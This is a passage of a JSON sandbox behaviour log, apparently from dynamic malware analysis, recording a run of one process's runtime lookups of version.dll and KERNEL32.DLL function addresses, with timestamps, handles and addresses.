"0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "version.dll" }, { "name": "ModuleHandle", "value": "0x74a30000" }, { "name": "FunctionName", "value": "VerQueryValueA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74a31540" } ], "repeated": 0, "id": 333 }, { "timestamp": "2025-03-02 21:32:32,529", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "version.dll" }, { "name": "ModuleHandle", "value": "0x74a30000" }, { "name": "FunctionName", "value": "GetFileVersionInfoSizeA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74a31520" } ], "repeated": 0, "id": 334 }, { "timestamp": "2025-03-02 21:32:32,545", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "version.dll" }, { "name": "ModuleHandle", "value": "0x74a30000" }, { "name": "FunctionName", "value": "GetFileVersionInfoA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x74a31500" } ], "repeated": 0, "id": 335 }, { "timestamp": "2025-03-02 21:32:32,545", "thread_id": "7632", "caller": "0x004e7287", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 336 }, { "timestamp": "2025-03-02 21:32:32,545", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "lstrcpyA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758783c0" } ], "repeated": 0, "id": 337 }, { "timestamp": "2025-03-02 21:32:32,545", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "lstrcmpiA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587eaa0" } ], "repeated": 0, "id": 338 }, { "timestamp": "2025-03-02 21:32:32,560", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "WriteFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883820" } ], "repeated": 0, "id": 339 }, { "timestamp": "2025-03-02 21:32:32,560", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "WaitForSingleObject" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883340" } ], "repeated": 0, "id": 340 }, { "timestamp": "2025-03-02 21:32:32,560", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualQuery" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f810" } ], "repeated": 0, "id": 341 }, { "timestamp": "2025-03-02 21:32:32,560", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualProtect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880760" } ], "repeated": 0, "id": 342 }, { "timestamp": "2025-03-02 21:32:32,576", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualFree" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f760" } ], "repeated": 0, "id": 343 }, { "timestamp": "2025-03-02 21:32:32,576", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f660" } ], "repeated": 0, "id": 344 }, { "timestamp": "2025-03-02 21:32:32,576", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Sleep" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758811a0" } ], "repeated": 0, "id": 345 }, { "timestamp": "2025-03-02 21:32:32,576", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SizeofResource" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880720" } ], "repeated": 0, "id": 346 }, { "timestamp": "2025-03-02 21:32:32,576", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetThreadLocale" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75878860" } ], "repeated": 0, "id": 347 }, { "timestamp": "2025-03-02 21:32:32,576", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetFilePointer" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758837c0" } ], "repeated": 0, "id": 348 }, { "timestamp": "2025-03-02 21:32:32,576", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetEvent" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758832f0" } ], "repeated": 0, "id": 349 }, { "timestamp": "2025-03-02 21:32:32,592", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetErrorMode" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758808b0" } ], "repeated": 0, "id": 350 }, { "timestamp": "2025-03-02 21:32:32,592", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetEndOfFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883780" } ], "repeated": 0, "id": 351 }, { "timestamp": "2025-03-02 21:32:32,592", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ResetEvent" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758832e0" } ], "repeated": 0, "id": 352 }, { "timestamp": "2025-03-02 21:32:32,592", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ReadFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883730" } ], "repeated": 0, "id": 353 }, { "timestamp": "2025-03-02 21:32:32,592", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "MulDiv" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75882fa0" } ], "repeated": 0, "id": 354 }, { "timestamp": "2025-03-02 21:32:32,607", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "LockResource" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f5e0" } ], "repeated": 0, "id": 355 }, { "timestamp": "2025-03-02 21:32:32,607", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "LoadResource" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587eae0" } ], "repeated": 0, "id": 356 }, { "timestamp": "2025-03-02 21:32:32,607", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "LoadLibraryA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880e70" } ], "repeated": 0, "id": 357 }, { "timestamp": "2025-03-02 21:32:32,623", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "LeaveCriticalSection" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7718e8b0" } ], "repeated": 0, "id": 358 }, { "timestamp": "2025-03-02 21:32:32,623", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "InitializeCriticalSection" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771ac860" } ], "repeated": 0, "id": 359 }, { "timestamp": "2025-03-02 21:32:32,623", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GlobalFindAtomA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758761f0" } ], "repeated": 0, "id": 360 }, { "timestamp": "2025-03-02 21:32:32,623", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GlobalDeleteAtom" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75881130" } ], "repeated": 0, "id": 361 }, { "timestamp": "2025-03-02 21:32:32,623", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GlobalAddAtomA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587b7b0" } ], "repeated": 0, "id": 362 }, { "timestamp": "2025-03-02 21:32:32,639", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetVersionExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75881a00" } ], "repeated": 0, "id": 363 }, { "timestamp": "2025-03-02 21:32:32,639", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetVersion" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75881c10" } ], "repeated": 0, "id": 364 }, { "timestamp": "2025-03-02 21:32:32,654", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetTickCount" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75882640" } ], "repeated": 0, "id": 365 }, { "timestamp": "2025-03-02 21:32:32,654", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetThreadLocale" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758789d0" } ], "repeated": 0, "id": 366 }, { "timestamp": "2025-03-02 21:32:32,670", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetTempPathA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883680" } ], "repeated": 0, "id": 367 }, { "timestamp": "2025-03-02 21:32:32,670", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetStdHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758819a0" } ], "repeated": 0, "id": 368 }, { "timestamp": "2025-03-02 21:32:32,670", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetProcAddress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f7f0" } ], "repeated": 0, "id": 369 }, { "timestamp": "2025-03-02 21:32:32,685", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleHandleA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880d00" } ], "repeated": 0, "id": 370 }, { "timestamp": "2025-03-02 21:32:32,685", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleFileNameA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758810d0" } ], "repeated": 0, "id": 371 }, { "timestamp": "2025-03-02 21:32:32,685", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetLocaleInfoA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75878410" } ], "repeated": 0, "id": 372 }, { "timestamp": "2025-03-02 21:32:32,685", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetLocalTime" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880e00" } ], "repeated": 0, "id": 373 }, { "timestamp": "2025-03-02 21:32:32,685", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetLastError" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587e2b0" } ], "repeated": 0, "id": 374 }, { "timestamp": "2025-03-02 21:32:32,701", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetFullPathNameA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883630" } ], "repeated": 0, "id": 375 }, { "timestamp": "2025-03-02 21:32:32,701", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetFileSize" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758835d0" } ], "repeated": 0, "id": 376 }, { "timestamp": "2025-03-02 21:32:32,701", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetFileAttributesA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883580" } ], "repeated": 0, "id": 377 }, { "timestamp": "2025-03-02 21:32:32,701", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetDiskFreeSpaceA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883520" } ], "repeated": 0, "id": 378 }, { "timestamp": "2025-03-02 21:32:32,701", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetDateFormatA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75895840" } ], "repeated": 0, "id": 379 }, { "timestamp": "2025-03-02 21:32:32,701", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCurrentThreadId" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587e1b0" } ], "repeated": 0, "id": 380 }, { "timestamp": "2025-03-02 21:32:32,701", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCurrentProcessId" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883100" } ], "repeated": 0, "id": 381 }, { "timestamp": "2025-03-02 21:32:32,717", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCurrentProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758830f0" } ], "repeated": 0, "id": 382 }, { "timestamp": "2025-03-02 21:32:32,717", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCPInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758817d0" } ], "repeated": 0, "id": 383 }, { "timestamp": "2025-03-02 21:32:32,717", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "FreeResource" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758814a0" } ], "repeated": 0, "id": 384 }, { "timestamp": "2025-03-02 21:32:32,717", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "InterlockedExchange" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75872e40" } ], "repeated": 0, "id": 385 }, { "timestamp": "2025-03-02 21:32:32,717", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "FreeLibrary" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880d80" } ], "repeated": 0, "id": 386 }, { "timestamp": "2025-03-02 21:32:32,717", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "FormatMessageA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75878c30" } ], "repeated": 0, "id": 387 }, { "timestamp": "2025-03-02 21:32:32,717", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "FindResourceA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75872eb0" } ], "repeated": 0, "id": 388 }, { "timestamp": "2025-03-02 21:32:32,717", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ExitProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a10" } ], "repeated": 0, "id": 389 }, { "timestamp": "2025-03-02 21:32:32,732", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "EnumCalendarInfoA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758792b0" } ], "repeated": 0, "id": 390 }, { "timestamp": "2025-03-02 21:32:32,732", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "EnterCriticalSection" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771900b0" } ], "repeated": 0, "id": 391 }, { "timestamp": "2025-03-02 21:32:32,732", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "DeleteFileA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833d0" } ], "repeated": 0, "id": 392 }, { "timestamp": "2025-03-02 21:32:32,748", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", 